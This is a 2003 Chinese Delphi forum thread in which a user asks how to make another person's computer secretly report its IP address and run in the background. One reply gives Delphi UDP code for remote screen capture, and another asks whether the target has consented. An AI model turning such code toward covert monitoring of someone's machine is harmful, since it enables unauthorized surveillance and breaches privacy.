怎么做个让对方的机器自动把IP地址发给我的软件

灯草拐杖 2003-01-07 09:48:21
同上
...全文
216 16 打赏 收藏 转发到动态 举报
写回复
用AI写文章
16 条回复
切换为时间正序
请发表友善的回复…
发表回复
灯草拐杖 2003-01-09
  • 打赏
  • 举报
回复
没有人知道啊,高手呢?/??????
灯草拐杖 2003-01-09
  • 打赏
  • 举报
回复
两个IP地址都是游变的啊,那么怎么样来控制主控机和受控机呢?
又怎么使受控机在后台运行?
上面的 okfly(太阳黑子)兄弟写的是一个对方抓取桌面的代码,但是还是要知道对方的IP才可以啊
我要的是能把对方的IP返回过来,在不知道对方的IP的情况下
huangrenguang 2003-01-09
  • 打赏
  • 举报
回复
我想你可以在你的机上做一个服务程序用来监视,等待对方的机子发送信息到你的服务程序中,在其他的机子上写一个客户端程序,用它来获取该机子的IP地址并发送到你的服务程序当中。
灯草拐杖 2003-01-08
  • 打赏
  • 举报
回复
知道我马上给分
easyboot 2003-01-08
  • 打赏
  • 举报
回复
ipconfig/all
把ip地址掉出来
通过socket发出去
RamjetZhang 2003-01-08
  • 打赏
  • 举报
回复
但是你这个程序是否经过对方同意?如果同意的话倒是很简单,很多网站都能显示访客的ip
stevenpeng 2003-01-08
  • 打赏
  • 举报
回复
同意
befree 2003-01-08
  • 打赏
  • 举报
回复
没礼貌的人向来信不过
okfly 2003-01-08
  • 打赏
  • 举报
回复
注意fromip
okfly 2003-01-08
  • 打赏
  • 举报
回复
为控件CUDP的OnDataReceived事件添加代码:
procedure TClient.CUDPDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var
CtrlCode:array[0..29] of char;
Buf:array[0..BufSize-1] of char;
TmpStr:string;
SendSize,LeftPos,TopPos,RightPos,BottomPos:integer;
begin
CUDP.ReadBuffer(CtrlCode,NumberBytes);{ 读取控制码 }
if CtrlCode[0]+CtrlCode[1]+CtrlCode[2]+CtrlCode[3]='show' then
begin { 控制码前4位为“show”表示主控机发出了抓屏指令 }
if BmpStream.Size=0 then { 没有数据可发,必须截屏生成数据 }
begin
TmpStr:=StrPas(CtrlCode);
TmpStr:=Copy(TmpStr,5,Length(TmpStr)-4);
LeftPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr)
-Pos(':',TmpStr));
TopPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr)-
Pos(':',TmpStr));
RightPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
BottomPos:=StrToInt(Copy(TmpStr,Pos(':',TmpStr
)+1,Length(TmpStr)-Pos(':',TmpStr)));
ScreenCap(LeftPos,TopPos,RightPos,BottomPos); {
截取屏幕 }
end;
if LeftSize>BufSize then SendSize:=BufSize
else SendSize:=LeftSize;
BmpStream.ReadBuffer(Buf,SendSize);
LeftSize:=LeftSize-SendSize;
if LeftSize=0 then BmpStream.Clear;{ 清空流 }
CUDP.RemoteHost:=FromIP; { FromIP为主控机IP地址 }
CUDP.SendBuffer(Buf,SendSize); { 将数据发到主控机的2222口 }
end;
end;

其中ScreenCap是自定义函数,截取屏幕指定区域,
代码如下:
procedure TClient.ScreenCap(LeftPos,TopPos,
RightPos,BottomPos:integer);
var
RectWidth,RectHeight:integer;
SourceDC,DestDC,Bhandle:integer;
Bitmap:TBitmap;
begin
RectWidth:=RightPos-LeftPos;
RectHeight:=BottomPos-TopPos;
SourceDC:=CreateDC('DISPLAY','','',nil);
DestDC:=CreateCompatibleDC(SourceDC);
Bhandle:=CreateCompatibleBitmap(SourceDC,
RectWidth,RectHeight);
SelectObject(DestDC,Bhandle);
BitBlt(DestDC,0,0,RectWidth,RectHeight,SourceDC,
LeftPos,TopPos,SRCCOPY);
Bitmap:=TBitmap.Create;
Bitmap.Handle:=BHandle;
BitMap.SaveToStream(BmpStream);
BmpStream.Position:=0;
LeftSize:=BmpStream.Size;
Bitmap.Free;
DeleteDC(DestDC);
ReleaseDC(Bhandle,SourceDC);
end;
存为“C:\VClient\ClnUnit.pas”和“C:\VClient\VClient.dpr”,
并编译。

  第二步,编制VServer.exe文件。新建Delphi工程,将窗体的Name属性设为“Server”。加入TNMUDP控件,Name属性设为“SUDP”;LocalPort属性设为“2222”,让控件SUDP监视主控机的2222端口,当有数据发送到该口时,触发控件SUDP的OnDataReceived事件;RemotePort属性设为“1111”,当控件SUDP发送数据时,将数据发到受控机的1111口。加入控件Image1,Align属性设为“alClient”;加入控件Button1,Caption属性设为“截屏”;加入控件Label1,Caption属性设为“左:上:右:下”;加入控件Edit1,Text属性设为“0:0:100:100”;加入控件Label2,Caption属性设为“受控机IP地址”;加入控件Edit2,Text属性设为“127.0.0.1”;
在implementation后面加入变量定义
const BufSize=2048;
var
RsltStream,TmpStream:TMemoryStream;

为Server的OnCreate事件添加代码:
procedure TServer.FormCreate(Sender: TObject);
begin
RsltStream:=TMemoryStream.Create;
TmpStream:=TMemoryStream.Create;
end;

为Client的OnDestroy事件添加代码:
procedure TServer.FormDestroy(Sender: TObject);
begin
RsltStream.Free;
TmpStream.Free;
end;

为控件Button1的OnClick事件添加代码:
procedure TServer.Button1Click(Sender: TObject);
var ReqCode:array[0..29] of char;ReqCodeStr:string;
begin
ReqCodeStr:='show'+Edit1.Text;
StrpCopy(ReqCode,ReqCodeStr);
TmpStream.Clear;
RsltStream.Clear;
SUDP.RemoteHost:=Edit2.Text;
SUDP.SendBuffer(ReqCode,30);
end;

为控件SUDP的OnDataReceived事件添加代码:
procedure TServer.SUDPDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var ReqCode:array[0..29] of char;ReqCodeStr:string;
begin
ReqCodeStr:='show'+Edit1.text;
StrpCopy(ReqCode,ReqCodeStr);
SUDP.ReadStream(TmpStream);
RsltStream.CopyFrom(TmpStream,NumberBytes);
if NumberBytes< BufSize then { 数据已读完 }
begin
RsltStream.Position:=0;
Image1.Picture.Bitmap.LoadFromStream(RsltStream);
TmpStream.Clear;
RsltStream.Clear;
end
else
begin
TmpStream.Clear;
ReqCode:='show';
SUDP.RemoteHost:=Edit2.Text;
SUDP.SendBuffer(ReqCode,30);
end;
end
自己参考吧!兄弟!我顺便说一句:说话别这末不礼貌

灯草拐杖 2003-01-07
  • 打赏
  • 举报
回复
用什么方法呀
zenartus 2003-01-07
  • 打赏
  • 举报
回复
up一下
灯草拐杖 2003-01-07
  • 打赏
  • 举报
回复
怎么没有人回答呀,555~~
灯草拐杖 2003-01-07
  • 打赏
  • 举报
回复
废话,你可以给个代码吗
stevenpeng 2003-01-07
  • 打赏
  • 举报
回复
运行一个自制的小软件在他的电脑
让软件自动发一条信息给你的软件,即可
灯草拐杖 2003-01-07
  • 打赏
  • 举报
回复
谁知道啊

1,593

社区成员

发帖
与我相关
我的任务
社区描述
Delphi 网络通信/分布式开发
社区管理员
  • 网络通信/分布式开发社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧